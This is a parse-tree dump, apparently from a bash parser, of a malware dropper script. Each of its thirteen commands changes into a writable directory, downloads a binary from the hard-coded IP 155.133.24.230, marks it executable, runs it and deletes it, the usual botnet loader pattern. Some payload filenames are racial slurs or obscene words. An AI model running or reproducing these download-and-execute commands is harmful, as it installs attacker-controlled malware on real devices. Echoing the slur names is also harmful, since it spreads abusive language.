ListNode(lineno=2, pos=(12, 150), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://155.133.24.230/tacojohn'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 121), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 121), word='tacojohn'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 133), parts=[
    WordNode(lineno=2, pos=(123, 133), word='./tacojohn'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(133, 134)),
  CommandNode(lineno=2, pos=(135, 150), parts=[
    WordNode(lineno=2, pos=(135, 137), word='rm'),
    WordNode(lineno=2, pos=(138, 141), word='-rf'),
    WordNode(lineno=2, pos=(142, 150), word='tacojohn'),
  ]),
])
ListNode(lineno=3, pos=(151, 301), parts=[
  CommandNode(lineno=3, pos=(151, 158), parts=[
    WordNode(lineno=3, pos=(151, 153), word='cd'),
    WordNode(lineno=3, pos=(154, 158), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 173), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 173), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(174, 176)),
  CommandNode(lineno=3, pos=(177, 184), parts=[
    WordNode(lineno=3, pos=(177, 179), word='cd'),
    WordNode(lineno=3, pos=(180, 184), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(185, 187)),
  CommandNode(lineno=3, pos=(188, 196), parts=[
    WordNode(lineno=3, pos=(188, 190), word='cd'),
    WordNode(lineno=3, pos=(191, 196), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 204), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 204), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(204, 205)),
  CommandNode(lineno=3, pos=(206, 244), parts=[
    WordNode(lineno=3, pos=(206, 210), word='wget'),
    WordNode(lineno=3, pos=(211, 244), word='http://155.133.24.230/cockerspain'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(244, 245)),
  CommandNode(lineno=3, pos=(246, 266), parts=[
    WordNode(lineno=3, pos=(246, 251), word='chmod'),
    WordNode(lineno=3, pos=(252, 254), word='+x'),
    WordNode(lineno=3, pos=(255, 266), word='cockerspain'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(266, 267)),
  CommandNode(lineno=3, pos=(268, 281), parts=[
    WordNode(lineno=3, pos=(268, 281), word='./cockerspain'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(281, 282)),
  CommandNode(lineno=3, pos=(283, 301), parts=[
    WordNode(lineno=3, pos=(283, 285), word='rm'),
    WordNode(lineno=3, pos=(286, 289), word='-rf'),
    WordNode(lineno=3, pos=(290, 301), word='cockerspain'),
  ]),
])
ListNode(lineno=4, pos=(302, 460), parts=[
  CommandNode(lineno=4, pos=(302, 309), parts=[
    WordNode(lineno=4, pos=(302, 304), word='cd'),
    WordNode(lineno=4, pos=(305, 309), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(310, 312)),
  CommandNode(lineno=4, pos=(313, 324), parts=[
    WordNode(lineno=4, pos=(313, 315), word='cd'),
    WordNode(lineno=4, pos=(316, 324), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(325, 327)),
  CommandNode(lineno=4, pos=(328, 335), parts=[
    WordNode(lineno=4, pos=(328, 330), word='cd'),
    WordNode(lineno=4, pos=(331, 335), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(336, 338)),
  CommandNode(lineno=4, pos=(339, 347), parts=[
    WordNode(lineno=4, pos=(339, 341), word='cd'),
    WordNode(lineno=4, pos=(342, 347), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(348, 350)),
  CommandNode(lineno=4, pos=(351, 355), parts=[
    WordNode(lineno=4, pos=(351, 353), word='cd'),
    WordNode(lineno=4, pos=(354, 355), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(355, 356)),
  CommandNode(lineno=4, pos=(357, 397), parts=[
    WordNode(lineno=4, pos=(357, 361), word='wget'),
    WordNode(lineno=4, pos=(362, 397), word='http://155.133.24.230/bigblackcockx'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(397, 398)),
  CommandNode(lineno=4, pos=(399, 421), parts=[
    WordNode(lineno=4, pos=(399, 404), word='chmod'),
    WordNode(lineno=4, pos=(405, 407), word='+x'),
    WordNode(lineno=4, pos=(408, 421), word='bigblackcockx'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(421, 422)),
  CommandNode(lineno=4, pos=(423, 438), parts=[
    WordNode(lineno=4, pos=(423, 438), word='./bigblackcockx'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(438, 439)),
  CommandNode(lineno=4, pos=(440, 460), parts=[
    WordNode(lineno=4, pos=(440, 442), word='rm'),
    WordNode(lineno=4, pos=(443, 446), word='-rf'),
    WordNode(lineno=4, pos=(447, 460), word='bigblackcockx'),
  ]),
])
ListNode(lineno=5, pos=(461, 599), parts=[
  CommandNode(lineno=5, pos=(461, 468), parts=[
    WordNode(lineno=5, pos=(461, 463), word='cd'),
    WordNode(lineno=5, pos=(464, 468), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(469, 471)),
  CommandNode(lineno=5, pos=(472, 483), parts=[
    WordNode(lineno=5, pos=(472, 474), word='cd'),
    WordNode(lineno=5, pos=(475, 483), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(484, 486)),
  CommandNode(lineno=5, pos=(487, 494), parts=[
    WordNode(lineno=5, pos=(487, 489), word='cd'),
    WordNode(lineno=5, pos=(490, 494), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(495, 497)),
  CommandNode(lineno=5, pos=(498, 506), parts=[
    WordNode(lineno=5, pos=(498, 500), word='cd'),
    WordNode(lineno=5, pos=(501, 506), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(507, 509)),
  CommandNode(lineno=5, pos=(510, 514), parts=[
    WordNode(lineno=5, pos=(510, 512), word='cd'),
    WordNode(lineno=5, pos=(513, 514), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(514, 515)),
  CommandNode(lineno=5, pos=(516, 551), parts=[
    WordNode(lineno=5, pos=(516, 520), word='wget'),
    WordNode(lineno=5, pos=(521, 551), word='http://155.133.24.230/pimplver'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(551, 552)),
  CommandNode(lineno=5, pos=(553, 570), parts=[
    WordNode(lineno=5, pos=(553, 558), word='chmod'),
    WordNode(lineno=5, pos=(559, 561), word='+x'),
    WordNode(lineno=5, pos=(562, 570), word='pimplver'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(570, 571)),
  CommandNode(lineno=5, pos=(572, 582), parts=[
    WordNode(lineno=5, pos=(572, 582), word='./pimplver'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(582, 583)),
  CommandNode(lineno=5, pos=(584, 599), parts=[
    WordNode(lineno=5, pos=(584, 586), word='rm'),
    WordNode(lineno=5, pos=(587, 590), word='-rf'),
    WordNode(lineno=5, pos=(591, 599), word='pimplver'),
  ]),
])
ListNode(lineno=6, pos=(600, 738), parts=[
  CommandNode(lineno=6, pos=(600, 607), parts=[
    WordNode(lineno=6, pos=(600, 602), word='cd'),
    WordNode(lineno=6, pos=(603, 607), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(608, 610)),
  CommandNode(lineno=6, pos=(611, 622), parts=[
    WordNode(lineno=6, pos=(611, 613), word='cd'),
    WordNode(lineno=6, pos=(614, 622), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(623, 625)),
  CommandNode(lineno=6, pos=(626, 633), parts=[
    WordNode(lineno=6, pos=(626, 628), word='cd'),
    WordNode(lineno=6, pos=(629, 633), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(634, 636)),
  CommandNode(lineno=6, pos=(637, 645), parts=[
    WordNode(lineno=6, pos=(637, 639), word='cd'),
    WordNode(lineno=6, pos=(640, 645), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(646, 648)),
  CommandNode(lineno=6, pos=(649, 653), parts=[
    WordNode(lineno=6, pos=(649, 651), word='cd'),
    WordNode(lineno=6, pos=(652, 653), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(653, 654)),
  CommandNode(lineno=6, pos=(655, 690), parts=[
    WordNode(lineno=6, pos=(655, 659), word='wget'),
    WordNode(lineno=6, pos=(660, 690), word='http://155.133.24.230/iihentai'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(690, 691)),
  CommandNode(lineno=6, pos=(692, 709), parts=[
    WordNode(lineno=6, pos=(692, 697), word='chmod'),
    WordNode(lineno=6, pos=(698, 700), word='+x'),
    WordNode(lineno=6, pos=(701, 709), word='iihentai'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(709, 710)),
  CommandNode(lineno=6, pos=(711, 721), parts=[
    WordNode(lineno=6, pos=(711, 721), word='./iihentai'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(721, 722)),
  CommandNode(lineno=6, pos=(723, 738), parts=[
    WordNode(lineno=6, pos=(723, 725), word='rm'),
    WordNode(lineno=6, pos=(726, 729), word='-rf'),
    WordNode(lineno=6, pos=(730, 738), word='iihentai'),
  ]),
])
ListNode(lineno=7, pos=(739, 873), parts=[
  CommandNode(lineno=7, pos=(739, 746), parts=[
    WordNode(lineno=7, pos=(739, 741), word='cd'),
    WordNode(lineno=7, pos=(742, 746), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(747, 749)),
  CommandNode(lineno=7, pos=(750, 761), parts=[
    WordNode(lineno=7, pos=(750, 752), word='cd'),
    WordNode(lineno=7, pos=(753, 761), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(762, 764)),
  CommandNode(lineno=7, pos=(765, 772), parts=[
    WordNode(lineno=7, pos=(765, 767), word='cd'),
    WordNode(lineno=7, pos=(768, 772), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(773, 775)),
  CommandNode(lineno=7, pos=(776, 784), parts=[
    WordNode(lineno=7, pos=(776, 778), word='cd'),
    WordNode(lineno=7, pos=(779, 784), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(785, 787)),
  CommandNode(lineno=7, pos=(788, 792), parts=[
    WordNode(lineno=7, pos=(788, 790), word='cd'),
    WordNode(lineno=7, pos=(791, 792), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(792, 793)),
  CommandNode(lineno=7, pos=(794, 828), parts=[
    WordNode(lineno=7, pos=(794, 798), word='wget'),
    WordNode(lineno=7, pos=(799, 828), word='http://155.133.24.230/ieaglez'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(828, 829)),
  CommandNode(lineno=7, pos=(830, 846), parts=[
    WordNode(lineno=7, pos=(830, 835), word='chmod'),
    WordNode(lineno=7, pos=(836, 838), word='+x'),
    WordNode(lineno=7, pos=(839, 846), word='ieaglez'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(846, 847)),
  CommandNode(lineno=7, pos=(848, 857), parts=[
    WordNode(lineno=7, pos=(848, 857), word='./ieaglez'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(857, 858)),
  CommandNode(lineno=7, pos=(859, 873), parts=[
    WordNode(lineno=7, pos=(859, 861), word='rm'),
    WordNode(lineno=7, pos=(862, 865), word='-rf'),
    WordNode(lineno=7, pos=(866, 873), word='ieaglez'),
  ]),
])
ListNode(lineno=8, pos=(874, 1020), parts=[
  CommandNode(lineno=8, pos=(874, 881), parts=[
    WordNode(lineno=8, pos=(874, 876), word='cd'),
    WordNode(lineno=8, pos=(877, 881), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(882, 884)),
  CommandNode(lineno=8, pos=(885, 896), parts=[
    WordNode(lineno=8, pos=(885, 887), word='cd'),
    WordNode(lineno=8, pos=(888, 896), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(897, 899)),
  CommandNode(lineno=8, pos=(900, 907), parts=[
    WordNode(lineno=8, pos=(900, 902), word='cd'),
    WordNode(lineno=8, pos=(903, 907), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(908, 910)),
  CommandNode(lineno=8, pos=(911, 919), parts=[
    WordNode(lineno=8, pos=(911, 913), word='cd'),
    WordNode(lineno=8, pos=(914, 919), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(920, 922)),
  CommandNode(lineno=8, pos=(923, 927), parts=[
    WordNode(lineno=8, pos=(923, 925), word='cd'),
    WordNode(lineno=8, pos=(926, 927), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(927, 928)),
  CommandNode(lineno=8, pos=(929, 966), parts=[
    WordNode(lineno=8, pos=(929, 933), word='wget'),
    WordNode(lineno=8, pos=(934, 966), word='http://155.133.24.230/polandfors'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(966, 967)),
  CommandNode(lineno=8, pos=(968, 987), parts=[
    WordNode(lineno=8, pos=(968, 973), word='chmod'),
    WordNode(lineno=8, pos=(974, 976), word='+x'),
    WordNode(lineno=8, pos=(977, 987), word='polandfors'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(987, 988)),
  CommandNode(lineno=8, pos=(989, 1001), parts=[
    WordNode(lineno=8, pos=(989, 1001), word='./polandfors'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1001, 1002)),
  CommandNode(lineno=8, pos=(1003, 1020), parts=[
    WordNode(lineno=8, pos=(1003, 1005), word='rm'),
    WordNode(lineno=8, pos=(1006, 1009), word='-rf'),
    WordNode(lineno=8, pos=(1010, 1020), word='polandfors'),
  ]),
])
ListNode(lineno=9, pos=(1021, 1167), parts=[
  CommandNode(lineno=9, pos=(1021, 1028), parts=[
    WordNode(lineno=9, pos=(1021, 1023), word='cd'),
    WordNode(lineno=9, pos=(1024, 1028), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1029, 1031)),
  CommandNode(lineno=9, pos=(1032, 1043), parts=[
    WordNode(lineno=9, pos=(1032, 1034), word='cd'),
    WordNode(lineno=9, pos=(1035, 1043), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1044, 1046)),
  CommandNode(lineno=9, pos=(1047, 1054), parts=[
    WordNode(lineno=9, pos=(1047, 1049), word='cd'),
    WordNode(lineno=9, pos=(1050, 1054), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1055, 1057)),
  CommandNode(lineno=9, pos=(1058, 1066), parts=[
    WordNode(lineno=9, pos=(1058, 1060), word='cd'),
    WordNode(lineno=9, pos=(1061, 1066), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1067, 1069)),
  CommandNode(lineno=9, pos=(1070, 1074), parts=[
    WordNode(lineno=9, pos=(1070, 1072), word='cd'),
    WordNode(lineno=9, pos=(1073, 1074), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1074, 1075)),
  CommandNode(lineno=9, pos=(1076, 1113), parts=[
    WordNode(lineno=9, pos=(1076, 1080), word='wget'),
    WordNode(lineno=9, pos=(1081, 1113), word='http://155.133.24.230/niggastand'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1113, 1114)),
  CommandNode(lineno=9, pos=(1115, 1134), parts=[
    WordNode(lineno=9, pos=(1115, 1120), word='chmod'),
    WordNode(lineno=9, pos=(1121, 1123), word='+x'),
    WordNode(lineno=9, pos=(1124, 1134), word='niggastand'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1134, 1135)),
  CommandNode(lineno=9, pos=(1136, 1148), parts=[
    WordNode(lineno=9, pos=(1136, 1148), word='./niggastand'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1148, 1149)),
  CommandNode(lineno=9, pos=(1150, 1167), parts=[
    WordNode(lineno=9, pos=(1150, 1152), word='rm'),
    WordNode(lineno=9, pos=(1153, 1156), word='-rf'),
    WordNode(lineno=9, pos=(1157, 1167), word='niggastand'),
  ]),
])
ListNode(lineno=10, pos=(1168, 1298), parts=[
  CommandNode(lineno=10, pos=(1168, 1175), parts=[
    WordNode(lineno=10, pos=(1168, 1170), word='cd'),
    WordNode(lineno=10, pos=(1171, 1175), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1176, 1178)),
  CommandNode(lineno=10, pos=(1179, 1190), parts=[
    WordNode(lineno=10, pos=(1179, 1181), word='cd'),
    WordNode(lineno=10, pos=(1182, 1190), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1191, 1193)),
  CommandNode(lineno=10, pos=(1194, 1201), parts=[
    WordNode(lineno=10, pos=(1194, 1196), word='cd'),
    WordNode(lineno=10, pos=(1197, 1201), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1202, 1204)),
  CommandNode(lineno=10, pos=(1205, 1213), parts=[
    WordNode(lineno=10, pos=(1205, 1207), word='cd'),
    WordNode(lineno=10, pos=(1208, 1213), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1214, 1216)),
  CommandNode(lineno=10, pos=(1217, 1221), parts=[
    WordNode(lineno=10, pos=(1217, 1219), word='cd'),
    WordNode(lineno=10, pos=(1220, 1221), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1221, 1222)),
  CommandNode(lineno=10, pos=(1223, 1256), parts=[
    WordNode(lineno=10, pos=(1223, 1227), word='wget'),
    WordNode(lineno=10, pos=(1228, 1256), word='http://155.133.24.230/nibbaf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1256, 1257)),
  CommandNode(lineno=10, pos=(1258, 1273), parts=[
    WordNode(lineno=10, pos=(1258, 1263), word='chmod'),
    WordNode(lineno=10, pos=(1264, 1266), word='+x'),
    WordNode(lineno=10, pos=(1267, 1273), word='nibbaf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1273, 1274)),
  CommandNode(lineno=10, pos=(1275, 1283), parts=[
    WordNode(lineno=10, pos=(1275, 1283), word='./nibbaf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1283, 1284)),
  CommandNode(lineno=10, pos=(1285, 1298), parts=[
    WordNode(lineno=10, pos=(1285, 1287), word='rm'),
    WordNode(lineno=10, pos=(1288, 1291), word='-rf'),
    WordNode(lineno=10, pos=(1292, 1298), word='nibbaf'),
  ]),
])
ListNode(lineno=11, pos=(1299, 1429), parts=[
  CommandNode(lineno=11, pos=(1299, 1306), parts=[
    WordNode(lineno=11, pos=(1299, 1301), word='cd'),
    WordNode(lineno=11, pos=(1302, 1306), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1307, 1309)),
  CommandNode(lineno=11, pos=(1310, 1321), parts=[
    WordNode(lineno=11, pos=(1310, 1312), word='cd'),
    WordNode(lineno=11, pos=(1313, 1321), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1322, 1324)),
  CommandNode(lineno=11, pos=(1325, 1332), parts=[
    WordNode(lineno=11, pos=(1325, 1327), word='cd'),
    WordNode(lineno=11, pos=(1328, 1332), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1333, 1335)),
  CommandNode(lineno=11, pos=(1336, 1344), parts=[
    WordNode(lineno=11, pos=(1336, 1338), word='cd'),
    WordNode(lineno=11, pos=(1339, 1344), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1345, 1347)),
  CommandNode(lineno=11, pos=(1348, 1352), parts=[
    WordNode(lineno=11, pos=(1348, 1350), word='cd'),
    WordNode(lineno=11, pos=(1351, 1352), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1352, 1353)),
  CommandNode(lineno=11, pos=(1354, 1387), parts=[
    WordNode(lineno=11, pos=(1354, 1358), word='wget'),
    WordNode(lineno=11, pos=(1359, 1387), word='http://155.133.24.230/repppy'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1387, 1388)),
  CommandNode(lineno=11, pos=(1389, 1404), parts=[
    WordNode(lineno=11, pos=(1389, 1394), word='chmod'),
    WordNode(lineno=11, pos=(1395, 1397), word='+x'),
    WordNode(lineno=11, pos=(1398, 1404), word='repppy'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1404, 1405)),
  CommandNode(lineno=11, pos=(1406, 1414), parts=[
    WordNode(lineno=11, pos=(1406, 1414), word='./repppy'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1414, 1415)),
  CommandNode(lineno=11, pos=(1416, 1429), parts=[
    WordNode(lineno=11, pos=(1416, 1418), word='rm'),
    WordNode(lineno=11, pos=(1419, 1422), word='-rf'),
    WordNode(lineno=11, pos=(1423, 1429), word='repppy'),
  ]),
])
ListNode(lineno=12, pos=(1430, 1556), parts=[
  CommandNode(lineno=12, pos=(1430, 1437), parts=[
    WordNode(lineno=12, pos=(1430, 1432), word='cd'),
    WordNode(lineno=12, pos=(1433, 1437), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1438, 1440)),
  CommandNode(lineno=12, pos=(1441, 1452), parts=[
    WordNode(lineno=12, pos=(1441, 1443), word='cd'),
    WordNode(lineno=12, pos=(1444, 1452), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1453, 1455)),
  CommandNode(lineno=12, pos=(1456, 1463), parts=[
    WordNode(lineno=12, pos=(1456, 1458), word='cd'),
    WordNode(lineno=12, pos=(1459, 1463), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1464, 1466)),
  CommandNode(lineno=12, pos=(1467, 1475), parts=[
    WordNode(lineno=12, pos=(1467, 1469), word='cd'),
    WordNode(lineno=12, pos=(1470, 1475), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1476, 1478)),
  CommandNode(lineno=12, pos=(1479, 1483), parts=[
    WordNode(lineno=12, pos=(1479, 1481), word='cd'),
    WordNode(lineno=12, pos=(1482, 1483), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1483, 1484)),
  CommandNode(lineno=12, pos=(1485, 1517), parts=[
    WordNode(lineno=12, pos=(1485, 1489), word='wget'),
    WordNode(lineno=12, pos=(1490, 1517), word='http://155.133.24.230/[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1517, 1518)),
  CommandNode(lineno=12, pos=(1519, 1533), parts=[
    WordNode(lineno=12, pos=(1519, 1524), word='chmod'),
    WordNode(lineno=12, pos=(1525, 1527), word='+x'),
    WordNode(lineno=12, pos=(1528, 1533), word='[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1533, 1534)),
  CommandNode(lineno=12, pos=(1535, 1542), parts=[
    WordNode(lineno=12, pos=(1535, 1542), word='./[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1542, 1543)),
  CommandNode(lineno=12, pos=(1544, 1556), parts=[
    WordNode(lineno=12, pos=(1544, 1546), word='rm'),
    WordNode(lineno=12, pos=(1547, 1550), word='-rf'),
    WordNode(lineno=12, pos=(1551, 1556), word='[cpu]'),
  ]),
])
ListNode(lineno=13, pos=(1557, 1695), parts=[
  CommandNode(lineno=13, pos=(1557, 1564), parts=[
    WordNode(lineno=13, pos=(1557, 1559), word='cd'),
    WordNode(lineno=13, pos=(1560, 1564), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1565, 1567)),
  CommandNode(lineno=13, pos=(1568, 1579), parts=[
    WordNode(lineno=13, pos=(1568, 1570), word='cd'),
    WordNode(lineno=13, pos=(1571, 1579), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1580, 1582)),
  CommandNode(lineno=13, pos=(1583, 1590), parts=[
    WordNode(lineno=13, pos=(1583, 1585), word='cd'),
    WordNode(lineno=13, pos=(1586, 1590), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1591, 1593)),
  CommandNode(lineno=13, pos=(1594, 1602), parts=[
    WordNode(lineno=13, pos=(1594, 1596), word='cd'),
    WordNode(lineno=13, pos=(1597, 1602), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1603, 1605)),
  CommandNode(lineno=13, pos=(1606, 1610), parts=[
    WordNode(lineno=13, pos=(1606, 1608), word='cd'),
    WordNode(lineno=13, pos=(1609, 1610), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1610, 1611)),
  CommandNode(lineno=13, pos=(1612, 1647), parts=[
    WordNode(lineno=13, pos=(1612, 1616), word='wget'),
    WordNode(lineno=13, pos=(1617, 1647), word='http://155.133.24.230/atakheli'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1647, 1648)),
  CommandNode(lineno=13, pos=(1649, 1666), parts=[
    WordNode(lineno=13, pos=(1649, 1654), word='chmod'),
    WordNode(lineno=13, pos=(1655, 1657), word='+x'),
    WordNode(lineno=13, pos=(1658, 1666), word='atakheli'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1666, 1667)),
  CommandNode(lineno=13, pos=(1668, 1678), parts=[
    WordNode(lineno=13, pos=(1668, 1678), word='./atakheli'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1678, 1679)),
  CommandNode(lineno=13, pos=(1680, 1695), parts=[
    WordNode(lineno=13, pos=(1680, 1682), word='rm'),
    WordNode(lineno=13, pos=(1683, 1686), word='-rf'),
    WordNode(lineno=13, pos=(1687, 1695), word='atakheli'),
  ]),
])
ListNode(lineno=14, pos=(1696, 1830), parts=[
  CommandNode(lineno=14, pos=(1696, 1703), parts=[
    WordNode(lineno=14, pos=(1696, 1698), word='cd'),
    WordNode(lineno=14, pos=(1699, 1703), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1704, 1706)),
  CommandNode(lineno=14, pos=(1707, 1718), parts=[
    WordNode(lineno=14, pos=(1707, 1709), word='cd'),
    WordNode(lineno=14, pos=(1710, 1718), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1719, 1721)),
  CommandNode(lineno=14, pos=(1722, 1729), parts=[
    WordNode(lineno=14, pos=(1722, 1724), word='cd'),
    WordNode(lineno=14, pos=(1725, 1729), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1730, 1732)),
  CommandNode(lineno=14, pos=(1733, 1741), parts=[
    WordNode(lineno=14, pos=(1733, 1735), word='cd'),
    WordNode(lineno=14, pos=(1736, 1741), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1742, 1744)),
  CommandNode(lineno=14, pos=(1745, 1749), parts=[
    WordNode(lineno=14, pos=(1745, 1747), word='cd'),
    WordNode(lineno=14, pos=(1748, 1749), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1749, 1750)),
  CommandNode(lineno=14, pos=(1751, 1785), parts=[
    WordNode(lineno=14, pos=(1751, 1755), word='wget'),
    WordNode(lineno=14, pos=(1756, 1785), word='http://155.133.24.230/cokaine'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1785, 1786)),
  CommandNode(lineno=14, pos=(1787, 1803), parts=[
    WordNode(lineno=14, pos=(1787, 1792), word='chmod'),
    WordNode(lineno=14, pos=(1793, 1795), word='+x'),
    WordNode(lineno=14, pos=(1796, 1803), word='cokaine'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1803, 1804)),
  CommandNode(lineno=14, pos=(1805, 1814), parts=[
    WordNode(lineno=14, pos=(1805, 1814), word='./cokaine'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1814, 1815)),
  CommandNode(lineno=14, pos=(1816, 1830), parts=[
    WordNode(lineno=14, pos=(1816, 1818), word='rm'),
    WordNode(lineno=14, pos=(1819, 1822), word='-rf'),
    WordNode(lineno=14, pos=(1823, 1830), word='cokaine'),
  ]),
])
